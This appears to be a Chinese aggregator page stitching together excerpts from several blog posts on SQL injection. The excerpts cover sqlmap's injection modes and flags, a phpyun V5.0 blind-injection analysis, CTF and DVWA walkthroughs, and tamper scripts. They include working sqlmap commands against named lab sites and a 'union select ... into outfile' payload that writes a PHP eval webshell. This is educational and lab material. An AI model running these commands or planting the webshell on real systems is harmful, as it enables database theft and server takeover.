sqlmap

sqlmap和dvwa-SQL Injection

霸气de小男生 提交于 2020-03-30 17:49:48
Sqlmap -支持的SQL注入方式 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 -支持的数据库: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB - 检测注入 -基本格式 :sqlmap -u “http://www.vuln.cn/post.php?id=1” -u [目标url] 默认使用一级检测,级别对应返回的信息详细情况(控制加-level n, eg:-level 4) -其他 跟随302跳转 Cookie注入(-level 2) 从post包注入 -常见注入参数Eg 获取当前数据库: python sqlmap.py -u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie =

网络安全从入门到精通(第四章-1)SQL注入的原理分析&工具的介绍

淺唱寂寞╮ 提交于 2020-03-28 08:21:13
本文内容: SQL注入本质 SQL注入软件环境的安装 Sqlmap的基础指令 Burpsuite工具的基础使用 浏览器插件的安装 1,SQL注入本质:   注入攻击的本质:是把用户输入的数据当做代码执行。   两个关键条件:     1.用户能够控制输入     2.是原本程序要执行的代码,拼接了用户输入的数据然后进行执行。   什么是SQL注入     就是针对SQL语句的注入,也可以理解为用户输入的数据当做SQL语句的代码执行     SQL注入是1998一名叫做rfg的黑客发表的一篇文庄所进入大众视线。     SQL注入在OWASP TOP10排行榜首。   注意:url编码具有误解:     # :是%23.     --qwe:是//。 2,SQL注入软件的环境安装:   Sqlmap是基于Python开发的工具。   Burpsuite是基于JAVA开放的工具。 我觉得这个两个环境的安装以及配置,就不用我多说了吧。 3,Sqlmap的基础指令:   Sqlmap是用的最广泛的自动化监测,利用SQL注入的渗透测试工具,支持多种数据库。   工具的核心:在于指令。   常用最基础指令:     -u 指定注入点     -r 打开文件     --dbs跑库名     --tables跑表名     --columns跑字段名     --dump枚举的数据[敏感指令

phpyun人才管理系统V5.0 SQL注入漏洞分析

微笑、不失礼 提交于 2020-03-26 15:01:07
*世界上最愚蠢的事莫过于我们无比狂热地做一件事,到最后却不知道为什么要做* cms背景介绍 PHP云人才管理系统(phpyun)是国内主流人才管理CMS系统之一!PHP云专为中文用户设计和开发,采用:B/S+c/s技术框架,程序源代码100%完全开放!基于PHP 和 MySQL 数据库构建的为核心开发。 漏洞类型 前台SQL盲注 漏洞描述 Phpyun最新版本V5.0中,在用户邮箱认证处,存在SQL延时注入。其未对 base64解密后的email参数进行任何过滤,从而导致漏洞产生。 漏洞产生链分析: 漏洞产生点位于 app\controller\qqconnect\index.class.php的cert_action函数 可以看到此函数开头将GET取得的结果经过base64_decode函数解码后分割引入 $arr数组中,此时可以绕过全局过滤,代表此处可以控制$arr[3]的值。再往下看: 此时可以看到,由于$arr[3]的值可控,所以导致$data的 email参数可控,并且引入upCertInfo函数的email参数可控。在跟进 upCertInfo函数: 可以看到在此函数中$data以及$whereData参数未经任何过滤又将其引入 upCertEmail函数,继续跟进: 可以看到此函数同样未对data数组中的参数未经过任何过滤,此时$email变量可控并将其引入

sqlmap简单使用

一个人想着一个人 提交于 2020-03-18 10:47:08
就以实验吧上那个简单的sql注入题为例吧,不过那道题确实经典,把sqlmap的整个使用过程都展现了一遍,先奉上那道题的地址: http://ctf5.shiyanbar.com/web/index_3.php 上截图: 第一步:先随便输一个参数,然后开始用工具,第一句话是使用-U 参数指定URL,如果URL存在注入点,将会显示web容器,数据库版本信息,如图 第二步: 使用 -dbs参数读取数据库,如图 第三步: 查看当前应用程序数据库 (不能发图了,每次发图还带用鼠标,宿舍关灯了,不能打扰其他人) 第四步:sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --table -D "web1" Database: web1 [2 tables] +-------+ | flag | | web_1 | +-------+ 列出指定数据库的所有表 (使用--table 参数获取数据库表,-D参数指定数据库) 第五步:sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T "flag" -D "web1" Database: web1 Table: flag [2 columns] +--------+----------+ |

SQLMap简单尝试

戏子无情 提交于 2020-03-14 09:43:53
第一次完成了一个注入呢,虽然是恬不知耻的用sqlmap跑出来的 简单介绍注入时后台的数据等级,有助于后面的理解   ①可以类比成一个装着excel文件的文件夹,每一个excel文件就相当于一个数据库      ②库的下一级是表,相当于一个文件中存在的sheet表      ③表的下级是列      ④每一列中又有字段,可以相当于excel中的一个格格啦 简单记一下步骤,大佬们不要嘲笑我这个菜鸡啦   1、获得注入点,一般在URL末尾存在参数   2、爆出所有数据库名称   3、选定数据库,列出其中的表   4、列出选定表中的列   5、列出选定列中的所有字段   6、爆出相应字段 下面以Geek2017的“Cloud的错误”实践一下(大佬们我错了,忘了不能先开wp的规则 ,这次先隐藏,求轻踩) 网页的源码中有提示"sycid=1",很明显这就是注入点的参数格式啦,丢sqlmap咯 1、检测注入点可用 sqlmap -u http://game.sycsec.com:2007/?sycid=1   -u :指定注入url 2、暴库 sqlmap -u http://game.sycsec.com:2007/?sycid=1 --dbs   --dbs :曝出该sqlserver中所有数据库名称   结果:好像看到了很有趣的“f1ag”库    3、列出数据库中的表 sqlmap -u

《sqlmap从入门到精通》已经正式出版

若如初见. 提交于 2020-03-12 17:07:28
原来只是想写一个专栏,后面发觉sqlmap真的非常牛逼,于是将相关知识整理成一本书,系统全面的介绍了sqlmap的使用,技巧和***利用技巧等。对于高手可以略过,对于想学安全的同学来说,有一定的借鉴,书中很多案例都是来自真实环境,有喜欢的朋友可以到京东进行购买,购买地址: https://item.jd.com/12671154.html 加了很多微信群,真正讨论技术的比较少,扯蛋的比较多,潜心学习,做强做深,走自己的路,让别人去说。 来源: 51CTO 作者: simeon2005 链接: https://blog.51cto.com/simeon/2426441

injector

霸气de小男生 提交于 2020-03-12 11:46:04
网上的注入工具很多,大多也有比较详细的解释,但是大部分windows下的注入软件都是对自己软件的一种推荐,而且很多也不是非常的安全,对于有些破解版本来说,很可能自身会被带有木马,所以,Linux下的注入工具也是非常强大的,不过分的说,可以完全取代Windows下面的所有注入工具。我所介绍的是一款名为SQLMAP的注入工具,有感兴趣的可以去他的官网看看哦! 首先,SQLMAP是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多猥琐的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令 其次,SQLMAP支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。 SQLMAP支持五种不同的注入模式: l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入; l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断; l 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中; l 联合查询注入

sqlmap续

大城市里の小女人 提交于 2020-03-09 22:46:16
sqlmap 续 注入语句 ( 知道绝对路径时候可用 ) http://192.168.99.171/test2/sqli/example10.php?catid=3 ’ union select 1,’<? @eval($_POST[xy])?>’,3,4 into outfile ‘C:/xampp/htdocs/test2/xinyu2.php ‘ --+ 检测注入: http://192.168.99.171/test/xinyu2.php 若有返回内容则已经写入 form 表单 --random-agent 随机请求 --cookie=COOKIE 身份赋予 --technique=TECH SQL injection techniques to use (default "BEUSTQ")T 时间 E 错误 C --dns-domain=DNS.. Domain name used for DNS exfiltration attack --DNS 域 =DNS.. 用于 DNS 渗出攻击的域名 burp 与 wireshark 的区别 http 协议抓包工具 burp ,能改能发,实时互动 wireshark 不能改只能抓住 burp : target (目标) proxy (代理) spider scanner intruder repeater sequencer

sqlmap介绍与使用案例

六眼飞鱼酱① 提交于 2020-03-08 09:14:31
1.sqlmap简介 最白话的介绍就是sqlmap是一个工具,一个用来做sql注入攻击的工具 2.windows安装python2 这个sqlmap需要python2才可以正常执行,注意python3不行哦,如果你已经安装了python3,本地同时安装python2和python3,需要注意修改其中一个python执行文件的名字,以便在path中添加环境变量的时候,可以正确区分,详细这里不进行赘述,如果不了解,建议自行百度。 windows安装sqlmap 3.1 下载压缩包 在sqlmap的网站上下载对应的压缩文件 http://sqlmap.org/ 3.2 解压文件 解压到任意文件夹皆可 解压以后大概是这个样子的 之后就是要执行这个sqlmap.py的文件 3.3 启动一个命令行,执行sqlmap.py 如果出现这个界面,表示一切正常 按任意键结束 4. 测试sqlmap功能 4.1 使用DVWA测试网站 4.1.1 关于dvwa 这个网站有sql漏洞,专门拿来测试用,不知道是哪位好心人搞出来的 网址是:http://43.247.91.228:81/login.php 登陆的用户名密码是:admin/password 4.1.2 操作 首先登陆成功以后三步走,拿到需要的url image.png 拿到url以后,就可以使用这个url来注入了 python2 sqlmap

SQLMAP自动注入(三)—Injection,Detection,Techniques

孤街浪徒 提交于 2020-03-08 07:43:12
-p 指定扫描的参数 ,对于user-agent,referer,host进行扫描 sqlmap -u "url地址" -p "user-agent,host" --dbs --skip 排除指定参数扫描 --skip"id,user-agent" URI注入点 sqlmap -u "http://targeturl/paraml/value*/value2" 当sqlmap扫描一些url地址时候,有些参数没有像规定标准设置,我们需要指定要扫描的参数是哪些,在指定参数后加*号 即表示此数据为我们要注入扫描的参数 --dbms 扫描数据库版本,我们可以指定扫描的数据库版本 --dbms="mysql" --os Linux windows 指定操作系统 --invalid-bignum / --invalid-logical 是某个参数取值失效 invalid-bignum 取到9999999 invalid-logical id=13 and 18=19 --tamper 混淆脚本,用于绕过应用层过滤 绕过WAF等等 sqlmap开发者已经编写好了几个Py脚本,可以提供我们使用 查看脚本位置: sqlmap -u "目标url+payload" --tamper="between.py,space2comment.py" 目的就是将我们的payload进行混淆提交